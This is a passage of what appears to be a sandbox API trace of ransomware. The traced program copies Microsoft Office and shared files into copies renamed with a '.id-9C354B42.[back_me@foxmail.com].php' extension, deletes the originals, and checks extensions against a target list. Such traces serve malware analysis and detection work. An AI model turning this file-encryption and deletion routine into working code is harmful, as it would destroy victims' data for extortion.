(lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.288] lstrlenW (lpString=".dbf") returned 4 [0052.288] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.288] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.288] lstrlenW (lpString=".1cd") returned 4 [0052.288] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.288] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.288] lstrlenW (lpString=".jpg") returned 4 [0052.288] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.288] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0052.288] lstrlenW (lpString="setup.exe") returned 9 [0052.289] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.291] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=1377656) returned 1 [0052.291] CloseHandle (hObject=0x1bc) returned 1 [0052.291] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0052.291] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.291] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.291] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0052.292] GetLastError () returned 0x0 [0052.292] ReadFile (in: hFile=0x1bc, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.714] WriteFile (in: hFile=0x220, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0052.734] ReadFile (in: hFile=0x1bc, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x50588, lpOverlapped=0x0) returned 1 [0052.754] WriteFile (in: hFile=0x220, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x50590, lpOverlapped=0x0) returned 1 [0052.884] ReadFile (in: hFile=0x1bc, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.885] WriteFile (in: hFile=0x220, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0052.885] SetEndOfFile (hFile=0x220) returned 1 [0052.885] CloseHandle (hObject=0x220) returned 1 [0052.885] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.885] SetEndOfFile (hFile=0x1bc) returned 1 [0052.889] CloseHandle (hObject=0x1bc) returned 1 [0052.889] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.889] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0052.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.890] lstrlenW (lpString=".doc") returned 4 [0052.890] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.890] lstrlenW (lpString=".docx") returned 5 [0052.890] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0052.890] lstrlenW (lpString=".pdf") returned 4 [0052.890] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.890] lstrlenW (lpString=".xls") returned 4 [0052.890] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.890] lstrlenW (lpString=".xlsx") returned 5 [0052.890] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0052.890] lstrlenW (lpString=".ppt") returned 4 [0052.890] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.890] lstrlenW (lpString=".zip") returned 4 [0052.890] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.890] lstrlenW (lpString=".rar") returned 4 [0052.890] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.890] lstrlenW (lpString=".bz2") returned 4 [0052.890] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.890] lstrlenW (lpString=".7z") returned 3 [0052.890] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.890] lstrlenW (lpString=".dbf") returned 4 [0052.890] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.890] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.890] lstrlenW (lpString=".1cd") returned 4 [0052.891] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.891] lstrlenW (lpString=".jpg") returned 4 [0052.891] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.891] lstrlenW (lpString=".doc") returned 4 [0052.891] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.891] lstrlenW (lpString=".docx") returned 5 [0052.891] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0052.891] lstrlenW (lpString=".pdf") returned 4 [0052.891] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString=".xls") returned 4 [0052.891] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString=".xlsx") returned 5 [0052.891] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0052.891] lstrlenW (lpString=".ppt") returned 4 [0052.891] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.891] lstrlenW (lpString=".zip") returned 4 [0052.891] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString=".rar") returned 4 [0052.891] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.891] lstrlenW (lpString=".bz2") returned 4 [0052.891] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.891] lstrlenW (lpString=".7z") returned 3 [0052.891] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.891] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.891] lstrlenW (lpString=".dbf") returned 4 [0052.892] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.892] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.892] lstrlenW (lpString=".1cd") returned 4 [0052.892] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.892] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0052.892] lstrlenW (lpString=".jpg") returned 4 [0052.892] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.892] lstrcmpiW (lpString1=".EXE", lpString2=".php") returned -1 [0052.892] lstrlenW (lpString="DW20.EXE") returned 8 [0052.892] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.556] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=994184) returned 1 [0053.556] CloseHandle (hObject=0x20c) returned 1 [0053.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20 [0053.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0053.556] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.556] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0053.557] GetLastError () returned 0x0 [0053.557] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xf2b88, lpOverlapped=0x0) returned 1 [0053.577] WriteFile (in: hFile=0x220, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xf2b90, lpOverlapped=0x0) returned 1 [0053.594] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.594] WriteFile (in: hFile=0x220, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0053.594] SetEndOfFile (hFile=0x220) returned 1 [0053.595] CloseHandle (hObject=0x220) returned 1 [0053.595] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.595] SetEndOfFile (hFile=0x20c) returned 1 [0053.602] CloseHandle (hObject=0x20c) returned 1 [0053.603] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.603] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.603] lstrlenW (lpString=".doc") returned 4 [0053.603] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0053.603] lstrlenW (lpString=".docx") returned 5 [0053.603] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0053.715] lstrlenW (lpString=".pdf") returned 4 [0053.715] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0053.715] lstrlenW (lpString=".xls") returned 4 [0053.715] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0053.715] lstrlenW (lpString=".xlsx") returned 5 [0053.715] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0053.715] lstrlenW (lpString=".ppt") returned 4 [0053.715] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0053.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.715] lstrlenW (lpString=".zip") returned 4 [0053.715] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0053.715] lstrlenW (lpString=".rar") returned 4 [0053.715] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0053.715] lstrlenW (lpString=".bz2") returned 4 [0053.715] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0053.715] lstrlenW (lpString=".7z") returned 3 [0053.715] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0053.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString=".dbf") returned 4 [0053.716] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0053.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString=".1cd") returned 4 [0053.716] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0053.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString=".jpg") returned 4 [0053.716] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString=".doc") returned 4 [0053.716] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0053.716] lstrlenW (lpString=".docx") returned 5 [0053.716] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0053.716] lstrlenW (lpString=".pdf") returned 4 [0053.716] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString=".xls") returned 4 [0053.716] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString=".xlsx") returned 5 [0053.716] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0053.716] lstrlenW (lpString=".ppt") returned 4 [0053.716] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.716] lstrlenW (lpString=".zip") returned 4 [0053.716] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString=".rar") returned 4 [0053.716] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0053.716] lstrlenW (lpString=".bz2") returned 4 [0053.716] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0053.716] lstrlenW (lpString=".7z") returned 3 [0053.716] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0053.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.717] lstrlenW (lpString=".dbf") returned 4 [0053.717] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0053.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.717] lstrlenW (lpString=".1cd") returned 4 [0053.717] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0053.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0053.717] lstrlenW (lpString=".jpg") returned 4 [0053.717] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0053.717] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0053.717] lstrlenW (lpString="odffilt.dll") returned 11 [0053.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0054.515] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=1312656) returned 1 [0054.516] CloseHandle (hObject=0x1b0) returned 1 [0054.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20 [0054.516] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0055.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0055.034] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.034] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.034] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0055.035] GetLastError () returned 0x0 [0055.035] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0055.059] WriteFile (in: hFile=0x1a8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0055.423] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x407a0, lpOverlapped=0x0) returned 1 [0055.437] WriteFile (in: hFile=0x1a8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x407b0, lpOverlapped=0x0) returned 1 [0055.444] ReadFile (in: hFile=0x218, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.444] WriteFile (in: hFile=0x1a8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0055.445] SetEndOfFile (hFile=0x1a8) returned 1 [0055.445] CloseHandle (hObject=0x1a8) returned 1 [0055.445] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.445] SetEndOfFile (hFile=0x218) returned 1 [0055.895] CloseHandle (hObject=0x218) returned 1 [0055.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0055.896] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1 [0055.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.896] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.896] lstrlenW (lpString=".doc") returned 4 [0055.896] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.896] lstrlenW (lpString=".docx") returned 5 [0055.896] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.896] lstrlenW (lpString=".pdf") returned 4 [0055.896] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.896] lstrlenW (lpString=".xls") returned 4 [0055.896] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.897] lstrlenW (lpString=".xlsx") returned 5 [0055.897] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.897] lstrlenW (lpString=".ppt") returned 4 [0055.897] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.897] lstrlenW (lpString=".zip") returned 4 [0055.897] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.897] lstrlenW (lpString=".rar") returned 4 [0055.897] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.897] lstrlenW (lpString=".bz2") returned 4 [0055.897] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.897] lstrlenW (lpString=".7z") returned 3 [0055.897] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.897] lstrlenW (lpString=".dbf") returned 4 [0055.897] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.897] lstrlenW (lpString=".1cd") returned 4 [0055.897] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.897] lstrlenW (lpString=".jpg") returned 4 [0055.897] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.897] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.898] lstrlenW (lpString=".doc") returned 4 [0055.898] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString=".docx") returned 5 [0055.898] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0055.898] lstrlenW (lpString=".pdf") returned 4 [0055.898] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString=".xls") returned 4 [0055.898] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString=".xlsx") returned 5 [0055.898] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0055.898] lstrlenW (lpString=".ppt") returned 4 [0055.898] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66 [0055.898] lstrlenW (lpString=".zip") returned 4 [0055.898] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString=".rar") returned 4 [0055.898] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.898] lstrlenW (lpString=".bz2") returned 4 [0055.898] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.898] lstrlenW (lpString=".7z") returned 3 [0055.898] lstrcmpiW (lpString1=".7z", 